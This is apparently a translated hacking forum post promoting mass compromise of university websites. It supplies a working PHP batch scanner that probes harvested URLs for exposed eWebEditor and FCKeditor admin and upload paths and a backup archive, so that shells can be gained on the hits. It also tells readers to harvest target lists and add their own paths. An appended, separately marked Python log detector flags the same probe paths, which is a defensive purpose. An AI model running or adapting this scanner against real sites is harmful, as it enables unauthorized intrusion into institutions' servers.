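Vulnerability EXP for mass compromise of university websites
University sites mostly run modified versions of a CMS, and a CMS always includes an editor. Current editors have few vulnerabilities
and are fairly secure, but university sites are different. A university's website is bound to be old,
unless it belongs to a newly founded university or college, so the probability that its CMS contains a vulnerable editor is high.
Therefore, we can get shells by batch-scanning for editors.
Our goal is to take sites in bulk; following this idea, we can use the script below for batch scanning.
The EXP is attached: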
<?php
//Coded by deleter
$f = fopen("scan_in.txt", 'r');
$fw = fopen("scan_out.txt", 'a');
$arr = array("/admin/editor/admin_login.asp",
"/manege/ewebeditor/admin_login.asp",
"/data/ewebeditor/admin_login.asp",
"/ewindoweditor/admin_login.asp",
"/webeditor/admin_login.asp",
"/Edit/eWebEditor.asp",
"/system/eWebEditor/",
"/admin/fckeditor/editor/filemanager/connectors/",
"/fckeditor/editor/filemanager/connectors/",
"/admin/FCKeditor/editor/filemanager/connectors/",
"/manage/FCKeditor/editor/filemanager/connectors/",
"/web_admin/editor/",
"/ewebeditor/",
"/wwwroot.rar",
"/admin/webeditor/admin_login.asp");
$url = trim(fgets($f));
while(!feof($f)&&(!empty($url))){
    foreach($arr as $key => $value){
        $request = 'http://'.$url.$value;
        // Request the file
        $html = file_get_contents($request);
        // Get the HTTP status code
        echo $request."\n";
        list($version,$status_code,$msg) = explode(' ',$http_response_header[0], 3);
        if($status_code=='200' || $status_code=='403'){
            fwrite($fw, $request."\n");
        }
    }
    $url = trim(fgets($f));
}
fclose($f);
fclose($fw);
?>
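Then just test the results one by one using the usual methods of getting a shell through an editor.
As for how to obtain scan_in.txt, just find a URL harvesting tool.
PS: add further scan paths yourself.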
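
Seen from the server side, the scan above shows up in an access log as one client requesting several of the listed editor paths in quick succession. The following is an added example, not part of the original post: it flags such clients and lists which of your own paths answered 200 or 403 and therefore need removal or access restriction. The combined log format, the `min_paths` threshold and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Substrings that cover every probe path in the script's $arr list (lower-cased).
MARKERS = ("ewebeditor", "editor/admin_login.asp",
           "fckeditor/editor/filemanager/connectors",
           "/web_admin/editor/", "/wwwroot.rar")

# Assumed log format: Apache/nginx "combined" access log.
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD|POST) (\S+) [^"]*" (\d{3})')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:02:11:01 +0000] "GET /admin/editor/admin_login.asp HTTP/1.0" 404 196 "-" "-"
203.0.113.7 - - [10/Mar/2024:02:11:01 +0000] "GET /ewebeditor/ HTTP/1.0" 403 199 "-" "-"
203.0.113.7 - - [10/Mar/2024:02:11:02 +0000] "GET /fckeditor/editor/filemanager/connectors/ HTTP/1.0" 200 512 "-" "-"
203.0.113.7 - - [10/Mar/2024:02:11:02 +0000] "GET /wwwroot.rar HTTP/1.0" 404 196 "-" "-"
198.51.100.20 - - [10/Mar/2024:09:30:12 +0000] "GET /index.asp HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Mar/2024:09:30:40 +0000] "GET /ewebeditor/ HTTP/1.1" 403 199 "-" "Mozilla/5.0"
"""


def find_editor_scanners(lines, min_paths=3):
    """Flag clients that requested at least min_paths distinct probe paths.

    'exposed' lists the paths that answered 200 or 403, i.e. the ones the
    scanner above would write to scan_out.txt and that need cleanup.
    """
    seen = defaultdict(dict)  # client ip -> {probe path: last status}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        ip, target, status = m.groups()
        path = target.split("?", 1)[0].lower()
        if any(marker in path for marker in MARKERS):
            seen[ip][path] = int(status)
    return {
        ip: {"paths": sorted(hits),
             "exposed": sorted(p for p, s in hits.items() if s in (200, 403))}
        for ip, hits in seen.items() if len(hits) >= min_paths
    }


if __name__ == "__main__":
    for ip, info in find_editor_scanners(SAMPLE_LOG.splitlines()).items():
        print(ip, len(info["paths"]), "probe paths; exposed:", info["exposed"])
```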